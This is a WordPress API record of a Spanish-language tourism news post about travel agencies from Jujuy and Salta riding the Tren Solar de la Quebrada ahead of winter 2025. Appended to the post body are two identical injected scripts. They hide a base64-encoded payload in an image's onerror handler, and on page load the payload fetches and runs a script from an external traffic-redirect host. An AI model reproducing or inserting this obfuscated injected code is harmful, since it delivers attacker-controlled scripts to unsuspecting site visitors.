{"id":5268,"date":"2025-06-19T08:56:13","date_gmt":"2025-06-19T11:56:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5268"},"modified":"2025-08-13T23:29:26","modified_gmt":"2025-08-14T02:29:26","slug":"agencias-de-turismo-vivieron-la-experiencia-del-tren-solar","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5268","title":{"rendered":"Agencias de turismo vivieron la experiencia del Tren Solar"},"content":{"rendered":"\n<p><strong><em>Representantes de agencias de\u00a0Turismo\u00a0conocieron el\u00a0Tren Solar\u00a0en un viaje exclusivo antes del inicio de la temporada de invierno<\/em><\/strong><\/p>\n\n\n\n<p>En v\u00edsperas del inicio de la temporada de\u00a0<strong>vacaciones invierno<\/strong>, un grupo de agencias de\u00a0<strong>turismo<\/strong>\u00a0de Jujuy y Salta vivieron de forma exclusiva la experiencia\u00a0<strong><a href=\"https:\/\/trensolar.com.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Tren Solar de la Quebrada\u00a0<\/a><\/strong>en un recorrido que permiti\u00f3 conocer de primera mano cada detalle del servicio que se ofrece a quienes visitan Jujuy<\/p>\n\n\n\n<p>Desde la operativa en estaciones hasta el dise\u00f1o de experiencias y servicios complementarios, el viaje permiti\u00f3 recorrer los tramos entre Volc\u00e1n y Purmamarca a bordo del tren, \u00fanico en su tipo en Latinoam\u00e9rica por su tracci\u00f3n h\u00edbrida solar y su integraci\u00f3n paisaj\u00edstica.<\/p>\n\n\n\n<p>Durante la jornada, las agencias accedieron a informaci\u00f3n clave para la venta del servicio, incluyendo opciones de traslados, paquetes tur\u00edsticos integrados, experiencias gastron\u00f3micas en estaciones, y la posibilidad de articular el recorrido del tren con excursiones a puntos emblem\u00e1ticos de la Quebrada.<\/p>\n\n\n\n<p>\u201cEste viaje nos permiti\u00f3 compartir con el sector privado la dimensi\u00f3n completa de una experiencia que no es solo de traslado, sino de conexi\u00f3n con el paisaje, la cultura y la sostenibilidad de Jujuy\u201d, destac\u00f3 responsable de Agencias, Lisandro Monta\u00f1o.&nbsp;<\/p>\n\n\n\n<p><strong>De la recorrida participaron: Agencias de Jujuy y Salta : &#8211; Las Salinas, ADN Travel, Dask Travel.<\/strong>&nbsp;<\/p>\n\n\n\n<p>El Tren Solar se prepara para una temporada alta con gran demanda, ofreciendo un servicio que apuesta por el turismo sostenible y la generaci\u00f3n de oportunidades en las&nbsp;<a href=\"https:\/\/prensa.jujuy.gob.ar\/tren-solar\/tren-solar-la-quebrada-turismo-sustentable-integracion-social-y-desarrollo-local-n119625\" target=\"_blank\" rel=\"noreferrer noopener\">comunidades locales.<\/a>&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Temporada de invierno<\/strong><\/h3>\n\n\n\n<p>En cuanto a la expectativa para el&nbsp;<strong>invierno&nbsp;<\/strong>2025, Juan Cabrera destac\u00f3, \u201cHasta el momento contamos con una gran demanda y un n\u00famero de reservas muy importante, hoy el&nbsp;<strong>Tren Solar&nbsp;<\/strong>capta la mirada de los turistas de todo el pa\u00eds cuando preparan su viaje al NOA\u201d, expres\u00f3 el presidente del Ente Aut\u00e1rquico Tren Solar de la Quebrada. Esta acci\u00f3n forma parte del trabajo articulado para que el&nbsp;<strong>sector tur\u00edstico privado<\/strong>, pueda conocer la experiencia y garantizar que cada visitante viva el Tren Solar de la quebrada de manera integral, y con identidad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/prensa.jujuy.gob.ar\/tren-solar\/agencias-turismo-vivieron-la-experiencia-del-tren-solar-n119818\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"313\" height=\"130\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_19-6-2025_8466_prensa.jujuy_.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-5269\" style=\"width:190px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_19-6-2025_8466_prensa.jujuy_.gob_.ar_.jpeg 313w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_19-6-2025_8466_prensa.jujuy_.gob_.ar_-300x125.jpeg 300w\" sizes=\"(max-width: 313px) 100vw, 313px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Representantes de agencias de\u00a0Turismo\u00a0conocieron el\u00a0Tren Solar\u00a0en un viaje exclusivo antes del inicio de la temporada de invierno En v\u00edsperas del inicio de la temporada de\u00a0vacaciones invierno, un grupo de agencias de\u00a0turismo\u00a0de Jujuy y Salta vivieron de forma exclusiva la experiencia\u00a0Tren Solar de la Quebrada\u00a0en un recorrido que permiti\u00f3 conocer de primera mano cada detalle del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5270,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-5268","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5268"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5268"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5268\/revisions"}],"predecessor-version":[{"id":6458,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5268\/revisions\/6458"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5270"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5268"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}